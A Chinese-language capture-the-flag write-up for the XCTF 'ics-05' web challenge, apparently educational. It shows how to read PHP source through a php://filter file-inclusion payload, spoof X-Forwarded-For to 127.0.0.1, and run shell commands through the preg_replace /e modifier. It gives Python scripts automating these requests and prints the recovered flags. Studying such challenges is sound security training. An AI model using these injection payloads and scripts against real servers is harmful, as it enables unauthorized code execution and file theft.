XCTF攻防世界web之ics-05（含自动化脚本）

一、手解

本文借鉴以下两篇文章的指导

https://www.jianshu.com/p/5a502873635b

https://blog.csdn.net/about23/article/details/95349625

 

全部点击一遍，只有这个可以有其他界面

 

题目描述是 “其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统”

在后面添加login.php 无果，御剑扫描也无结果，源码也找不到其他东西

再次点击上面的“云平台设备维护中心”,URL栏有参数?page=index  存在get传值

 

page的参数联想到可能存在文件包含漏洞

引用上面的文章内容

LFI漏洞的黑盒判断方法：
单纯的从URL判断的话，URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞

 

输入数字没啥用，尝试读取index.php的源码，采用php伪协议

?page=php://filter/read=convert.base64-encode/resource=index.php

为什么中间要转base64编码，如果不转码，则相当于进行请求网页（继续打开网页）
输入payload得到一段base64

 

然后解码，分析源码

 

伪造XFF头来登入系统，同时利用preg_replace函数的漏洞

preg_replace( pattern , replacement , subject ) :

当pre_replace的参数pattern输入/e的时候 ,参数replacement的代码当作PHP代码执行
于是构造payload

/index.php?pat=/123/e&rep=system("find+-iname+flag")&sub=123

注：这里

”+“号在url中会被解释成空格号，这里用%20也行

用burpsuite来设置XFF头

 

继续查看   %26被url解释成&号   用来连接命令

&& 前面命令为假直接报错，后面语句不执行（前面命令执行成功，后面的命令也执行）

index.php?pat=/123/e&rep=system("cd+./s3chahahaDir/flag%26%26ls")&sub=123

 

 

 最后的payload

index.php?pat=/123/e&rep=system("cat+./s3chahahaDir/flag/flag.php")&sub=123

 

得flag

cyberpeace{a3f41e3943e9bd48b8084b29e4b27182}

 

 

 

注意

preg_replace的用法是这样的：

那么其实这里的payload中的pat是123，sub是123：
index.php?pat=/123/e&rep=system(“cat+./s3chahahaDir/flag/flag.php”)&sub=123

也可以是pat为1，sub为123这样，只要sub把pat包在里面就行；而pat为123，sub为1是不行的。

二、写自动化脚本

这里拓展下用python写自动化脚本：
第一个脚本是把php的filter伪协议获取的index.php的base64编码的源码进行base64解码后，写入同一目录下的result.php中：

import re
import requests
import base64

burp0_url = "http://111.200.241.244:64303/index.php/login/?page=php://filter/read=convert.base64-encode/resource=index.php"
response = requests.get(burp0_url)
result1 = re.findall('<p class="lead">\s+(.*)', response.text) #目前的理解：\s代表匹配任意空白字符，这个+代表无论多少都将空白字符匹配掉
#print(response.text)
#print(result1)
result2 = ''.join(result1) #join()方法用于将序列中的元素以指定的字符连接生成一个新的字符串
#print(result2)
result = str(base64.b64decode(result2), "utf-8")
print(result)

file = open('result.php','w')
file.write(result)

这里展示结果：

那么这里写进来后，直接在脚本的同一目录下打开result.php来进行下一步的代码审计：

审计完就可以开始来获取flag了。这里写的第二个脚本是因为我用burp来手动在请求包添加XFF头的时候，响应包居然不会出现那个Welcome My Admin !，那么这里不知道是哪里出了问题。那么便来用python来模拟请求：

import requests
import re

burp0_url = 'http://111.200.241.244:64303/index.php?pat=/123/e&rep=system("find+-iname+flag")&sub=123'
burp0_cookies = {"PHPSESSID": "a70ecfmos0qoiotgunelqqvl85"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "X-Forwarded-For": "127.0.0.1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
response=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
print(response.text)
result = re.findall("flag = (.*)",response.text)

print(result)

最终这个：

import requests
import re

burp0_url = 'http://111.200.241.244:56339/index.php?pat=/123/e&rep=system("cat+./s3chahahaDir/flag/flag.php")&sub=123'
burp0_cookies = {"PHPSESSID": "a70ecfmos0qoiotgunelqqvl85"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "X-Forwarded-For": "127.0.0.1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
response=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
print(response.text)
result1 = re.findall("flag = (.*)",response.text)
result = ''.join(result1)
print("正则表达式匹配出的flag："+ result)

flag为cyberpeace{d66325024cfcac289357d18b48725e46}